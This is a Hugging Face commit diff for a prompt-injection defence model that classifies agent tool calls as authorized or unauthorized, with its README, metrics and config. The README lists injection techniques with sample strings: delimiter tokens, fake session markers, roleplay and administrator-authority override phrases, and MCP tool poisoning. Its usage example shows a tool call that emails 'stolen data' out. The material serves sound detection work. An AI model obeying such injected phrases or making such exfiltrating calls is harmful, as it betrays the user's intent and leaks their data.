Update model with binary classification (UNAUTHORIZED F1: 93.50%)

Files changed (6)

README.md +103 -99
best_metrics.json +24 -30
config.json +4 -7
final_report.json +6 -6
model.safetensors +2 -2
training_config.json +7 -11

README.md CHANGED

@@ -1,91 +1,59 @@
----
-license: apache-2.0
-language:
-- en
-tags:
-- modernbert
-- security
-- jailbreak-detection
-- prompt-injection
-- tool-calling
-- token-classification
-datasets:
-- microsoft/llmail-inject-challenge
-- allenai/wildjailbreak
-- hackaprompt/hackaprompt-dataset
-- JailbreakBench/JBB-Behaviors
-metrics:
-- f1
-- accuracy
-- precision
-- recall
-base_model: answerdotai/ModernBERT-base
-pipeline_tag: token-classification
-model-index:
-- name: tool-call-verifier
-  results:
-  - task:
-      type: token-classification
-      name: Tool Call Verification
-    metrics:
-    - name: UNAUTHORIZED F1
-      type: f1
-      value: 0.9394
-    - name: UNAUTHORIZED Precision
-      type: precision
-      value: 0.9719
-    - name: UNAUTHORIZED Recall
-      type: recall
-      value: 0.9062
-    - name: Accuracy
-      type: accuracy
-      value: 0.9380
----
 # ToolCallVerifier - Unauthorized Tool Call Detection
-A ModernBERT-based token classifier that detects **unauthorized tool calls** in LLM agent systems. This model is Stage 2 of a two-stage jailbreak detection pipeline, designed to verify whether tool calls generated by an LLM are authorized by the user's original intent.
-## Model Description
-This model performs **token-level classification** on tool call JSON to identify unauthorized or suspicious arguments that may have been injected through prompt injection attacks.
-### Labels
-| Label | Severity | Description |
-|-------|----------|-------------|
-| AUTHORIZED | 0 | Token is part of a legitimate, user-requested action |
-| SUSPICIOUS | 2 | Token requires additional verification |
-| UNAUTHORIZED | 4 | Token indicates injected/malicious content - **BLOCK** |
-## Performance
 | Metric | Value |
 |--------|-------|
-| **UNAUTHORIZED F1** | **93.94%** |
-| UNAUTHORIZED Precision | 97.19% |
-| UNAUTHORIZED Recall | 90.62% |
-| Overall Accuracy | **93.80%** |
-### Comparison with Previous Version
-| Metric | Previous | Current | Improvement |
-|--------|----------|---------|-------------|
-| UNAUTHORIZED F1 | 81.59% | **93.94%** | +12.35% |
-| UNAUTHORIZED Recall | 72.39% | **90.62%** | +18.23% |
-| Accuracy | 91.53% | **93.80%** | +2.27% |
-## Training Data
-Trained on **~38,000 samples** combining real-world attacks and synthetic patterns:
 ### HuggingFace Datasets
 | Dataset | Description | Samples |
 |---------|-------------|---------|
 | [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
-| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~10,000 |
-| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~10,000 |
 | [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
 ### Synthetic Attack Generators
@@ -94,25 +62,32 @@ Trained on **~38,000 samples** combining real-world attacks and synthetic patter
 |-----------|-------------|
 | Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
 | Filesystem | File/directory operation attacks |
-| Network | Network/API attacks |
-| Email | Email tool attacks |
-| Financial | Transaction attacks |
 | Code Execution | Code injection attacks |
-| Authentication | Access control attacks |
-### Attack Categories Covered
 | Category | Source | Description |
 |----------|--------|-------------|
-| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
 | Word Obfuscation | LLMail | Inserting noise words between tokens |
 | Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
 | Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
 | XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
 | Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
 | Intent Mismatch | Synthetic | User asks X, tool does Y |
-## Usage
 ```python
 from transformers import AutoTokenizer, AutoModelForTokenClassification
@@ -123,8 +98,8 @@ tokenizer = AutoTokenizer.from_pretrained(model_name)
 model = AutoModelForTokenClassification.from_pretrained(model_name)
 # Example: Verify a tool call
-tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
 user_intent = "Summarize my emails"
 # Combine for classification
 input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
@@ -134,45 +109,64 @@ with torch.no_grad():
     outputs = model(**inputs)
     predictions = torch.argmax(outputs.logits, dim=-1)
-id2label = {0: "AUTHORIZED", 1: "SUSPICIOUS", 2: "UNAUTHORIZED"}
 labels = [id2label[p.item()] for p in predictions[0]]
-if "UNAUTHORIZED" in labels:
     print("⚠️ BLOCKED: Unauthorized tool call detected!")
 else:
     print("✅ Tool call authorized")
 ```
-## Training Configuration
 | Parameter | Value |
 |-----------|-------|
-| Base Model | answerdotai/ModernBERT-base |
-| Max Length | 2048 tokens |
-| Batch Size | 4 |
-| Epochs | 6 |
-| Learning Rate | 1e-5 |
 | Loss | CrossEntropyLoss (class-weighted) |
-| Class Weights | [0.5, 2.0, 3.0] |
-| Attention | SDPA (Flash Attention on ROCm) |
-| Hardware | AMD Instinct MI300X |
-## Integration with FunctionCallSentinel
 This model is **Stage 2** of a two-stage defense pipeline:
-1. **Stage 1 ([FunctionCallSentinel](https://huggingface.co/rootfs/function-call-sentinel))**: Classify prompts for injection risk
-2. **Stage 2 (This Model)**: Verify generated tool calls are authorized
 | Scenario | Recommendation |
 |----------|----------------|
 | General chatbot | Stage 1 only |
 | Tool-calling agent (low risk) | Stage 1 only |
-| Tool-calling agent (high risk) | Both stages |
-| Email/file system access | Both stages |
-| Financial transactions | Both stages |
-## Intended Use
 ### Primary Use Cases
 - **LLM Agent Security**: Verify tool calls before execution
@@ -184,13 +178,23 @@ This model is **Stage 2** of a two-stage defense pipeline:
 - Non-tool-calling scenarios
 - Languages other than English
-## Limitations
-1. **Tool schema dependent**: Best performance when tool schema is included in input
-2. **English only**: Not tested on other languages
-3. **Novel attacks**: May not catch completely novel attack patterns
-## License
 Apache 2.0

 # ToolCallVerifier - Unauthorized Tool Call Detection
+<div align="center">
+[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
+[![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
+[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)
+**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
+</div>
+---
+## 🎯 What This Model Does
+ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
+| Label | Description |
+|-------|-------------|
+| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
+| `UNAUTHORIZED` | Token indicates injected/malicious content — **BLOCK** |
+---
+## 📊 Performance
 | Metric | Value |
 |--------|-------|
+| **UNAUTHORIZED F1** | **93.50%** |
+| UNAUTHORIZED Precision | 95.01% |
+| UNAUTHORIZED Recall | 92.05% |
+| Overall Accuracy | 92.88% |
+### Confusion Matrix (Token-Level)
+```
+                    Predicted
+                 AUTH      UNAUTH
+Actual AUTH      130,708    8,483
+       UNAUTH     13,924   161,031
+```
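
The headline metrics can be re-derived approximately from the token-level confusion matrix above. The following is a minimal sketch in plain Python that treats UNAUTHORIZED as the positive class; the function name `binary_metrics` is illustrative and not part of the model repository. The matrix counts reproduce the reported figures to roughly three decimal places rather than exactly.

```python
def binary_metrics(tp: int, fp: int, fn: int, tn: int) -> dict:
    """Precision, recall, F1 and accuracy for the positive class."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    accuracy = (tp + tn) / (tp + fp + fn + tn)
    return {
        "precision": precision,
        "recall": recall,
        "f1": f1,
        "accuracy": accuracy,
    }


# Counts read off the confusion matrix, with UNAUTHORIZED as positive:
#   tp = actual UNAUTH predicted UNAUTH, fp = actual AUTH predicted UNAUTH,
#   fn = actual UNAUTH predicted AUTH,   tn = actual AUTH predicted AUTH.
metrics = binary_metrics(tp=161_031, fp=8_483, fn=13_924, tn=130_708)
for name, value in metrics.items():
    print(f"{name}: {value:.4f}")
```

The row sums (139,191 and 174,955) match the per-class `support` values in `best_metrics.json`.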
+---
+## 🗂️ Training Data
+Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
 ### HuggingFace Datasets
 | Dataset | Description | Samples |
 |---------|-------------|---------|
 | [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
+| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
+| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
 | [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
 ### Synthetic Attack Generators
 |-----------|-------------|
 | Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
 | Filesystem | File/directory operation attacks |
+| Network | Network/API exfiltration attacks |
+| Email | Email tool hijacking |
+| Financial | Transaction manipulation |
 | Code Execution | Code injection attacks |
+| Authentication | Access control bypass |
+| MCP Attacks | Tool poisoning, shadowing, rug pulls |
+---
+## 🚨 Attack Categories Covered
 | Category | Source | Description |
 |----------|--------|-------------|
+| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}\]\])` |
 | Word Obfuscation | LLMail | Inserting noise words between tokens |
 | Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
 | Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
 | XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
 | Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
 | Intent Mismatch | Synthetic | User asks X, tool does Y |
+| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
+| MCP Shadowing | Synthetic | Fake authorization context |
+---
+## 💻 Usage
 ```python
 from transformers import AutoTokenizer, AutoModelForTokenClassification
 model = AutoModelForTokenClassification.from_pretrained(model_name)
 # Example: Verify a tool call
 user_intent = "Summarize my emails"
+tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
 # Combine for classification
 input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
     outputs = model(**inputs)
     predictions = torch.argmax(outputs.logits, dim=-1)
+id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
+tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
 labels = [id2label[p.item()] for p in predictions[0]]
+# Check for unauthorized tokens
+unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
+if unauthorized_tokens:
     print("⚠️ BLOCKED: Unauthorized tool call detected!")
+    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
 else:
     print("✅ Tool call authorized")
 ```
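
The usage example prints the first five flagged tokens individually. For logging or review it can help to group consecutive flagged tokens into spans. The sketch below is one possible way to do that in plain Python; the helper `flagged_spans` and the hand-written `tokens` and `labels` lists are illustrative stand-ins, not real tokenizer or model output.

```python
from itertools import groupby


def flagged_spans(tokens, labels, target="UNAUTHORIZED"):
    """Group runs of consecutive tokens that carry the target label."""
    spans = []
    pairs = zip(tokens, labels)
    for label, group in groupby(pairs, key=lambda pair: pair[1]):
        if label == target:
            spans.append([token for token, _ in group])
    return spans


# Hand-written stand-ins for the tokenizer output and model predictions.
tokens = ["send", "_email", "to", "attacker", "body", "stolen", "data"]
labels = [
    "AUTHORIZED", "AUTHORIZED", "AUTHORIZED", "UNAUTHORIZED",
    "AUTHORIZED", "UNAUTHORIZED", "UNAUTHORIZED",
]

spans = flagged_spans(tokens, labels)
print(spans)  # [['attacker'], ['stolen', 'data']]
```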
+---
+## ⚙️ Training Configuration
 | Parameter | Value |
 |-----------|-------|
+| Base Model | `answerdotai/ModernBERT-base` |
+| Max Length | 512 tokens |
+| Batch Size | 32 |
+| Epochs | 5 |
+| Learning Rate | 3e-5 |
 | Loss | CrossEntropyLoss (class-weighted) |
+| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
+| Attention | SDPA (Flash Attention) |
+| Hardware | AMD Instinct MI300X (ROCm) |
+---
+## 🔗 Integration with FunctionCallSentinel
 This model is **Stage 2** of a two-stage defense pipeline:
+```
+┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
+│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
+│                 │     │      (Stage 1)       │     │                 │
+└─────────────────┘     └──────────────────────┘     └────────┬────────┘
+                                                              │
+                               ┌──────────────────────────────▼──────────────────────────┐
+                               │           ToolCallVerifier (This Model)                 │
+                               │   Token-level verification before tool execution        │
+                               └─────────────────────────────────────────────────────────┘
+```
 | Scenario | Recommendation |
 |----------|----------------|
 | General chatbot | Stage 1 only |
 | Tool-calling agent (low risk) | Stage 1 only |
+| Tool-calling agent (high risk) | **Both stages** |
+| Email/file system access | **Both stages** |
+| Financial transactions | **Both stages** |
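
The control flow in the diagram can be sketched as a small gating function. This is only an illustration of the "both stages" configuration: the three callables are hypothetical placeholders for the Stage 1 classifier, the LLM, and this model, and none of the names come from either model repository.

```python
from typing import Callable, Optional


def guarded_tool_call(
    prompt: str,
    stage1_flags_prompt: Callable[[str], bool],
    generate_tool_call: Callable[[str], str],
    stage2_flags_call: Callable[[str, str], bool],
) -> Optional[str]:
    """Return the tool call only if both stages pass, otherwise None."""
    # Stage 1: reject risky prompts before the LLM sees them.
    if stage1_flags_prompt(prompt):
        return None
    tool_call = generate_tool_call(prompt)
    # Stage 2: verify the generated call against the user's intent.
    if stage2_flags_call(prompt, tool_call):
        return None
    return tool_call


# Toy stand-ins so the sketch runs without any model.
result = guarded_tool_call(
    "Summarize my emails",
    stage1_flags_prompt=lambda p: "ignore previous" in p.lower(),
    generate_tool_call=lambda p: '{"name": "send_email"}',
    stage2_flags_call=lambda p, call: "send_email" in call,
)
print(result)  # None: the toy Stage 2 check blocks the call
```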
+---
+## 🎯 Intended Use
 ### Primary Use Cases
 - **LLM Agent Security**: Verify tool calls before execution
 - Non-tool-calling scenarios
 - Languages other than English
+---
+## ⚠️ Limitations
+1. **Tool schema dependent** — Best performance when tool schema is included in input
+2. **English only** — Not tested on other languages
+3. **Binary classification** — No "suspicious" intermediate category (by design, for decisiveness)
+---
+## 📜 License
 Apache 2.0
+---
+## 🔗 Links
+- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)

best_metrics.json CHANGED

@@ -1,42 +1,36 @@
 {
   "classification_report": {
     "AUTHORIZED": {
-      "precision": 0.9060726044066687,
-      "recall": 0.9763638542027211,
-      "f1-score": 0.9399058716483996,
-      "support": 150236.0
-    },
-    "SUSPICIOUS": {
-      "precision": 0.0,
-      "recall": 0.0,
-      "f1-score": 0.0,
-      "support": 0.0
     },
     "UNAUTHORIZED": {
-      "precision": 0.9761577042642191,
-      "recall": 0.9053128424828136,
-      "f1-score": 0.9394014777290658,
-      "support": 160592.0
     },
-    "accuracy": 0.9396547286602237,
     "macro avg": {
-      "precision": 0.627410102890296,
-      "recall": 0.6272255655618449,
-      "f1-score": 0.6264357831258218,
-      "support": 310828.0
     },
     "weighted avg": {
-      "precision": 0.9422826831522249,
-      "recall": 0.9396547286602237,
-      "f1-score": 0.9396452721261762,
-      "support": 310828.0
     }
   },
-  "accuracy": 0.9396547286602237,
-  "macro_f1": 0.6264357831258218,
-  "weighted_f1": 0.9396452721261762,
-  "unauthorized_avg_f1": 0.9394014777290658,
-  "unauthorized_precision": 0.9761577042642191,
-  "unauthorized_recall": 0.9053128424828136,
-  "unauthorized_f1": 0.9394014777290658
 }

 {
   "classification_report": {
     "AUTHORIZED": {
+      "precision": 0.9037877897531266,
+      "recall": 0.9392273925756695,
+      "f1-score": 0.9211668545659526,
+      "support": 139191.0
     },
     "UNAUTHORIZED": {
+      "precision": 0.950093511979563,
+      "recall": 0.9204538309851105,
+      "f1-score": 0.9350388443092216,
+      "support": 174955.0
     },
+    "accuracy": 0.9287719722676717,
     "macro avg": {
+      "precision": 0.9269406508663448,
+      "recall": 0.9298406117803899,
+      "f1-score": 0.9281028494375871,
+      "support": 314146.0
     },
     "weighted avg": {
+      "precision": 0.9295764919238567,
+      "recall": 0.9287719722676717,
+      "f1-score": 0.9288924788474447,
+      "support": 314146.0
     }
   },
+  "accuracy": 0.9287719722676717,
+  "macro_f1": 0.9281028494375871,
+  "weighted_f1": 0.9288924788474447,
+  "unauthorized_avg_f1": 0.9350388443092216,
+  "unauthorized_precision": 0.950093511979563,
+  "unauthorized_recall": 0.9204538309851105,
+  "unauthorized_f1": 0.9350388443092216
 }
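
The jump in `macro_f1` from about 0.626 to about 0.928 follows from the label change rather than from a large change in per-class quality: the old report averaged over three classes, one of which (SUSPICIOUS) had zero support and an F1 of 0. A small sketch that recomputes the macro and weighted F1 from the per-class values in both versions of the report; the helper name `macro_and_weighted` is illustrative.

```python
def macro_and_weighted(per_class):
    """per_class maps label -> (f1, support); returns (macro, weighted)."""
    total_support = sum(support for _, support in per_class.values())
    macro = sum(f1 for f1, _ in per_class.values()) / len(per_class)
    weighted = (
        sum(f1 * support for f1, support in per_class.values())
        / total_support
    )
    return macro, weighted


# Per-class F1 and support copied from the old and new reports.
old_report = {
    "AUTHORIZED": (0.9399058716483996, 150236),
    "SUSPICIOUS": (0.0, 0),
    "UNAUTHORIZED": (0.9394014777290658, 160592),
}
new_report = {
    "AUTHORIZED": (0.9211668545659526, 139191),
    "UNAUTHORIZED": (0.9350388443092216, 174955),
}

old_macro, old_weighted = macro_and_weighted(old_report)
new_macro, new_weighted = macro_and_weighted(new_report)
print(f"old: macro={old_macro:.4f} weighted={old_weighted:.4f}")
print(f"new: macro={new_macro:.4f} weighted={new_weighted:.4f}")
```

The weighted F1, which ignores the empty class, moves only from about 0.940 to about 0.929.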

config.json CHANGED

@@ -22,16 +22,14 @@
   "hidden_size": 768,
   "id2label": {
     "0": "AUTHORIZED",
-    "1": "SUSPICIOUS",
-    "2": "UNAUTHORIZED"
   },
   "initializer_cutoff_factor": 2.0,
   "initializer_range": 0.02,
   "intermediate_size": 1152,
   "label2id": {
     "AUTHORIZED": 0,
-    "SUSPICIOUS": 1,
-    "UNAUTHORIZED": 2
   },
   "layer_norm_eps": 1e-05,
   "local_attention": 128,
@@ -51,6 +49,5 @@
   "sparse_pred_ignore_index": -100,
   "sparse_prediction": false,
   "transformers_version": "4.57.3",
-  "vocab_size": 50368,
-  "hidden_act": "gelu"
-}

   "hidden_size": 768,
   "id2label": {
     "0": "AUTHORIZED",
+    "1": "UNAUTHORIZED"
   },
   "initializer_cutoff_factor": 2.0,
   "initializer_range": 0.02,
   "intermediate_size": 1152,
   "label2id": {
     "AUTHORIZED": 0,
+    "UNAUTHORIZED": 1
   },
   "layer_norm_eps": 1e-05,
   "local_attention": 128,
   "sparse_pred_ignore_index": -100,
   "sparse_prediction": false,
   "transformers_version": "4.57.3",
+  "vocab_size": 50368
+}

final_report.json CHANGED

@@ -1,8 +1,8 @@
 {
-  "accuracy": 0.9396547286602237,
-  "unauthorized_precision": 0.9761577042642191,
-  "unauthorized_recall": 0.9053128424828136,
-  "unauthorized_f1": 0.9394014777290658,
-  "unauthorized_avg_f1": 0.9394014777290658,
-  "macro_f1": 0.6264357831258218
 }

 {
+  "accuracy": 0.9287719722676717,
+  "unauthorized_precision": 0.950093511979563,
+  "unauthorized_recall": 0.9204538309851105,
+  "unauthorized_f1": 0.9350388443092216,
+  "unauthorized_avg_f1": 0.9350388443092216,
+  "macro_f1": 0.9281028494375871
 }

model.safetensors CHANGED

@@ -1,3 +1,3 @@
 version https://git-lfs.github.com/spec/v1
-oid sha256:7ccb513de8777a67a5e44994e6265dedcd6c335d7c88442ba9bf630bea5b913e
-size 598442860

 version https://git-lfs.github.com/spec/v1
+oid sha256:992a572e923cbb0b336b5ced300c43badc4e91934a32d5bd6dd66c8017e9d75b
+size 598439784

training_config.json CHANGED

@@ -1,30 +1,26 @@
 {
   "model_name": "answerdotai/ModernBERT-base",
-  "num_labels": 3,
   "label2id": {
     "AUTHORIZED": 0,
-    "SUSPICIOUS": 1,
-    "UNAUTHORIZED": 2
   },
   "id2label": {
     "0": "AUTHORIZED",
-    "1": "SUSPICIOUS",
-    "2": "UNAUTHORIZED"
   },
   "severity": {
     "AUTHORIZED": 0,
-    "SUSPICIOUS": 2,
     "UNAUTHORIZED": 4
   },
   "loss": "CrossEntropyLoss (class-weighted)",
   "class_weights": [
     0.5,
-    2.0,
     3.0
   ],
   "optimization_target": "unauthorized_f1",
-  "batch_size": 4,
-  "epochs": 6,
-  "learning_rate": 1e-05,
-  "max_length": 2048
 }

 {
   "model_name": "answerdotai/ModernBERT-base",
+  "num_labels": 2,
   "label2id": {
     "AUTHORIZED": 0,
+    "UNAUTHORIZED": 1
   },
   "id2label": {
     "0": "AUTHORIZED",
+    "1": "UNAUTHORIZED"
   },
   "severity": {
     "AUTHORIZED": 0,
     "UNAUTHORIZED": 4
   },
   "loss": "CrossEntropyLoss (class-weighted)",
   "class_weights": [
     0.5,
     3.0
   ],
   "optimization_target": "unauthorized_f1",
+  "batch_size": 16,
+  "epochs": 5,
+  "learning_rate": 3e-05,
+  "max_length": 1024
 }
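
To make the effect of `"class_weights": [0.5, 3.0]` concrete, here is a plain-Python sketch of class-weighted cross-entropy. It assumes the convention PyTorch uses for `torch.nn.CrossEntropyLoss(weight=...)` with the default mean reduction: each token's loss is scaled by the weight of its true class, and the sum is divided by the sum of those weights. Whether the training script used exactly this reduction, and whether it skipped positions labelled `-100`, is an assumption; the function name is illustrative.

```python
import math

# AUTHORIZED, UNAUTHORIZED (values from training_config.json)
CLASS_WEIGHTS = [0.5, 3.0]


def weighted_cross_entropy(logits, targets, weights=CLASS_WEIGHTS,
                           ignore_index=-100):
    """Weighted mean of per-token negative log-likelihoods."""
    weighted_sum = 0.0
    weight_total = 0.0
    for row, target in zip(logits, targets):
        if target == ignore_index:
            continue  # assumed convention for padding / special tokens
        # Log-sum-exp with max subtraction for numerical stability.
        peak = max(row)
        log_norm = peak + math.log(sum(math.exp(x - peak) for x in row))
        nll = log_norm - row[target]
        weighted_sum += weights[target] * nll
        weight_total += weights[target]
    if weight_total == 0.0:
        raise ValueError("no labelled tokens to average over")
    return weighted_sum / weight_total


# Two tokens with identical logits: one AUTHORIZED, one UNAUTHORIZED.
# The model is confident in class 0, so the UNAUTHORIZED token is missed.
logits = [[2.0, 0.0], [2.0, 0.0]]
loss = weighted_cross_entropy(logits, targets=[0, 1])
unweighted = weighted_cross_entropy(logits, targets=[0, 1], weights=[1.0, 1.0])
print(f"weighted={loss:.4f} unweighted={unweighted:.4f}")
```

With these weights, an error on an UNAUTHORIZED token contributes six times as much to the numerator as the same error on an AUTHORIZED token, which is consistent with the stated `optimization_target` of `unauthorized_f1`.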